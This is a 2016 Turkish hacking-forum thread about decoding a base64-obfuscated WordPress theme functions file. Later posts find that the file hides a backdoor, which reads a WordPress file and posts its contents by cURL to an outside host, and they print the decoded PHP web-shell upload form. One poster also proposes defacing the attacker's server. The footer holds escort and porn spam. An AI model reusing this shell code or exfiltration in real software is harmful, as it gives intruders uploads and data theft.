KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Bu Kodlamayı Çözebilecek (İoncube Değil)
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 18:01
Mesaj: #1
Merhaba arkadaşlar öncelikle konuyu off topic bölümüne açamadım oraya girince hata alıyorum bu yüzden görevliler taşırsa sevinirim.

uckan temasının function dosyası çözemedim.
yardımcı olabilecek varsa iyi olur.

http://paste.fedoraproject.org/461936/14775840/

WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 18:08
Mesaj: #2
base64 ile kodlanmış

WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 18:14
Mesaj: #3
çözemedim ama yadım edermisin

WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 19:20
Mesaj: #4
çözmen çok zor ancak manuel çözebilirsin oda zaman alır

(Son Düzenleme: 27.10.2016, 19:23, Düzenleyen: dima.)
WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 20:45
Mesaj: #5
@furqanx42 al bro kırdım + Rapimi isterim )

https://paste.fedoraproject.org/462006/93781147/

@dima kırılması zor değil isteyene video çeker açıklamalı anlatarak gösteririm. sadece php'nin mantığını bilmelisin kodu okuya bilmelisin kodu takip ettikten sonra hallediliyor.
                                                                                                                      İmage

WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 21:05
Mesaj: #6
Benimde kastettiğim bilmeyen için çok zor ama işi bilen için basit yolları var ;) string base64_decode ( string $veri [, bool $titiz = false ] )

WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 22:08
Mesaj: #7
base64 şifrelemesi  bunu çözmek  biraz zor

WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 22:11
Mesaj: #8
@dima

string base64_decode ( string $veri [, bool $titiz = false ] ) ? alakası varmıymış acaba kopyala yapıştırla olmuyor bro her biri farklı ;)
                                                                                                                      İmage

WWW Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 27.10.2016, 22:13
Mesaj: #9
o attıgın dosyada şifrelenmiş bak shell var çözen arkadaşın kodlarına bakarsan yakaladimsizi.txt diye bişeyden dosya çektiriyor onu açtıgın zamanda vur kadehi.php felan yani scriptin/temanın yapımcısı shell koymuş içine dikkatli ol
make a mistake and fix this. thats how you learn things

Alıntı ile Cevapla
Konu : Bu Kodlamayı Çözebilecek (İoncube Değil) - 28.10.2016, 00:05
Mesaj: #10
@myrctitan kaldırılabilir incelmemiştim kodları ama dediğin gibi daha sonra inceledim ve şuna ulaştım

/wp-includes/class-wp-option.php İçindeki tüm veriyi çekiyor 'file_get_contents' kodu ile daha sonra cURL olarak bu sayfaya 'http://yakaladimsizi.com/yeni/zorun_ne/vur_kadehi.php?,get_verileri' post ediyor dışardan yani kendi sunucusuna veri tabanına bağlanmadan yapmış oluyor çünkü kendi sunucusunuda risk atmak istemez bu hata ile )

neyse bu fonksiyonu silerek tamamen temiz hale getirilir. ama işin ZEVKLİ yanı bu adamın sunucusuna kocaman nah resimli bir indexi post edebiliriz İLLEG4LİZM adı altında keyif verir )

$get_verilerinide base64 ile şifrelemiş önemli yer olduğu için kırdığımız zaman ise.

echo "<b>".php_uname()."</b>";
echo "<br><br>";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Yukleme Basarili</b><br><br>';
}
}

post name (_upl = Upload) adı altında dediğim gibi 'http://yakaladimsizi.com/yeni/zorun_ne/vur_kadehi.php?,get_verileri' adresine post ediyor.
                                                                                                                      İmage

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort türk ifşa hd porno